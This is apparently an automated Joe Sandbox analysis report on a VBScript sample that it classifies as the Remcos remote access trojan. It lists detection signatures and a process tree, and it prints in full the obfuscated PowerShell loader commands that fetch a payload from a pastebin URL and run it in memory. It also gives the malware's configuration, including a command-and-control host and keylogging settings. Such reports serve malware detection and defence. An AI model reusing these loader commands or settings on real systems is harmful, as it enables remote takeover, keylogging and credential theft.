Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
asegurar.vbs

Overview

General Information

Sample name:asegurar.vbs
Analysis ID:1545852
MD5:aee210142f6411df0f3c0469d2a9df27
SHA1:991b0e994e4da9f76bf9fd03bc3fef75dfd94590
SHA256:3a07acb9e24dace059cea1a5c9c90f457e3c0d3e823805ae2fd0241d75917fc2
Tags:vbsuser-lontze7
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Potential dropper URLs found in powershell memory
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5480 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 3428 cmdline: "C:\Windows\system32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • PING.EXE (PID: 2476 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • powershell.exe (PID: 5480 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 7372 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["sost.duckdns.org:2001:0"], "Assigned name": "NewssTar", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T0UVJ0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              Click to see the 22 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              8.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                8.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  8.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    8.2.AddInProcess32.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6c4b8:$a1: Remcos restarted by watchdog!
                    • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                    8.2.AddInProcess32.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x6657c:$str_b2: Executing file:
                    • 0x675fc:$str_b3: GetDirectListeningPort
                    • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x67128:$str_b7: \update.vbs
                    • 0x665a4:$str_b9: Downloaded file:
                    • 0x66590:$str_b10: Downloading file:
                    • 0x66634:$str_b12: Failed to upload file:
                    • 0x675c4:$str_b13: StartForward
                    • 0x675e4:$str_b14: StopForward
                    • 0x67080:$str_b15: fso.DeleteFile "
                    • 0x67014:$str_b16: On Error Resume Next
                    • 0x670b0:$str_b17: fso.DeleteFolder "
                    • 0x66624:$str_b18: Uploaded file:
                    • 0x665e4:$str_b19: Unable to delete:
                    • 0x67048:$str_b20: while fso.FileExists("
                    • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 24 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?
                    Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D?
                    Sigma detected: Invoke-Obfuscation VAR+ Launcher
                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 